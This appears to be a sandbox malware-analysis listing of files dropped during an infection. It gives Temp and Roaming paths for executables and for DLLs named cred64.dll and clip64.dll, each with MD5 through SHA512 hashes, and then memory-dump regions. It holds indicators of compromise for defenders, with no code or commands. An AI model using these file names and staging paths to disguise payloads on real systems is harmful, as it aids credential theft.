C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
| MD5 | a7ad3f23c4bdb0122dbb1557223eee4c |
| SHA1 | fe2201cdb7f2f678d533abd2b0479cdadc63c54d |
| SHA256 | 947d7ec35a3e57d7b835bb14276584cce4b926a9e9ea6378d10b2d9069d0b59f |
| SHA512 | 8df206f3a3b07b0c5a119fb2c75697cb7055f2f313f35a140542f212e8b4133ada7d74a42b27865b4000f5d20fc2727783da92cea91f56fe7fdff77dddffae2b |
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
| MD5 | 40f43ca072ae3cb3f3fa501994b28c18 |
| SHA1 | b478237639f8a322593221ff4d087a6d85c1757e |
| SHA256 | 71ac9835dbc17e6b360ecd027cf99f261f9b85aabffcbde7c8eb2babf948b694 |
| SHA512 | aa1cc8f2edc79a5c74683a5e8eae836d4bd4cdfa77387bc5c90ba833a614c8b0905e7c5ce43323db7348ff3ed44dcbbe758762b96ebda7cce42eac5cde952063 |
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
| SHA1 | f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a |
| SHA256 | a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4 |
| SHA512 | ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41 |
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
| MD5 | ebd584e9c1a400cd5d4bafa0e7936468 |
| SHA1 | d263c62902326425ed17855d49d35003abcd797b |
| SHA256 | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b |
| SHA512 | e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010 |
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
| MD5 | ebd584e9c1a400cd5d4bafa0e7936468 |
| SHA1 | d263c62902326425ed17855d49d35003abcd797b |
| SHA256 | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b |
| SHA512 | e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010 |
memory/1824-2143-0x00000000071E0000-0x00000000071F0000-memory.dmp
memory/1824-2141-0x00000000071E0000-0x00000000071F0000-memory.dmp
memory/1824-2144-0x00000000071E0000-0x00000000071F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
| MD5 | af4268c094f2a9c6e6a85f8626b9a5c7 |
| SHA1 | 7d6b6083ec9081f52517cc7952dfb0c1c416e395 |
| SHA256 | 07b974442b53035b8d057a7b429c191fe71f149a698041b005ee85645a89c165 |
| SHA512 | 2ab2d4771841ebbeb195d21697c1708db985ae821a7ed3e2bb050c5759fbdb1e7784354fa5611e377a603a6db437e90a7258ecfcbea7703e584330b91eacac68 |
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
| MD5 | b7c05216d55cd437ddd7edd811cdee80 |
| SHA1 | ba0490a14b8243f684d9b9975b7e6c5087f976e1 |
| SHA256 | 922a4c143d4517afbd2a8254776283a2b8982a6ed6950a0024ca86357db1eab8 |
| SHA512 | d3ea0b9515c9138ef6f7459b9fe3a91af03d38dddd538776c054731bfb4df78fa19794163c725c5ee0d906041c16ac53dff9d1fe7b2579564fabb1b5d394ee10 |
memory/3516-2461-0x00000000002A0000-0x0000000000318000-memory.dmp
memory/3516-2468-0x0000000002960000-0x0000000002A00000-memory.dmp
memory/3516-2485-0x00000000028E0000-0x00000000028F0000-memory.dmp
memory/1824-2889-0x00000000071E0000-0x00000000071F0000-memory.dmp
memory/1824-2892-0x00000000071E0000-0x00000000071F0000-memory.dmp
memory/1824-2895-0x00000000071E0000-0x00000000071F0000-memory.dmp
memory/3516-3097-0x00000000028E0000-0x00000000028F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj
| MD5 | 95a12fa5756d0040e1c1284371ea17e4 |
| SHA1 | a9c9c457a87ecca994364b6b0a8bbe815c64197d |
| SHA256 | 805458918a058fbae738b7e4fc57e4d3b8317adf26d11b9b9e53e22bc946b562 |
| SHA512 | 1d71748f56e83e3d8e68bcec6a17ace238d904e767a10ef20c86be8c785ab3c3fea60c832e3b68e0277467ac1b053849d1f3d52bd872b2b9aa7206616ced56c5 |
memory/1824-3520-0x0000000008000000-0x000000000804B000-memory.dmp
memory/1824-3521-0x00000000071E0000-0x00000000071F0000-memory.dmp
memory/3516-3872-0x00000000028F0000-0x0000000002946000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe
| MD5 | d56d7c144f628c19a5b62e62a478c3d5 |
| SHA1 | 46de41d4635fef57622bc406c6df50c8a9f4a31b |
| SHA256 | ef31ddae2d0b1dfc0ae3dd18cacbcf752a7c63ffc51ffdd8ec921184facc4659 |
| SHA512 | 615856535a8f4be508740c0df9e6c16c3ecbb91dd257968b23c6e70f67990c44ccb946b963228dac88cc60aa3e669dfd85805c855bf88f37acca42f2c5332b26 |
memory/4916-3880-0x00000000009D0000-0x0000000000A02000-memory.dmp
memory/4916-3881-0x0000000005410000-0x000000000545B000-memory.dmp
memory/4916-3882-0x0000000005210000-0x0000000005220000-memory.dmp
memory/3516-3883-0x000000001BF20000-0x000000001BF6C000-memory.dmp
memory/3516-3884-0x000000001CB90000-0x000000001CBE4000-memory.dmp
memory/3516-3886-0x00000000028E0000-0x00000000028F0000-memory.dmp
memory/3516-3887-0x00000000028E0000-0x00000000028F0000-memory.dmp
memory/3516-3889-0x000000001D330000-0x000000001D346000-memory.dmp
memory/3996-3896-0x0000000140000000-0x00000001407CD000-memory.dmp
memory/3516-3902-0x00000000028E0000-0x00000000028F0000-memory.dmp
memory/3516-3901-0x00000000028E0000-0x00000000028F0000-memory.dmp
memory/3996-3903-0x0000011A44060000-0x0000011A440A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
| SHA512 | 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff |
\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
| SHA512 | 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | d1eb5caae43e95e1f369ca373a5e192d |
| SHA1 | bafa865f8f2cb5bddf951357e70af9fb011d6ac2 |
| SHA256 | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 |
| SHA512 | e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | e1fe62c436de6b2c3bf0fd32e0f779c1 |
| SHA1 | dbaadf172ed878592ae299e27eb98e2614b7b36b |
| SHA256 | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 |
| SHA512 | e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee |
\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | d1eb5caae43e95e1f369ca373a5e192d |
| SHA1 | bafa865f8f2cb5bddf951357e70af9fb011d6ac2 |
| SHA256 | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 |
| SHA512 | e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a |
\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | e1fe62c436de6b2c3bf0fd32e0f779c1 |
| SHA1 | dbaadf172ed878592ae299e27eb98e2614b7b36b |
| SHA256 | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 |
| SHA512 | e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee |
memory/3996-3946-0x0000000140000000-0x00000001407CD000-memory.dmp
memory/3996-3949-0x0000011A440A0000-0x0000011A440C0000-memory.dmp
memory/3996-3950-0x0000011A440A0000-0x0000011A440C0000-memory.dmp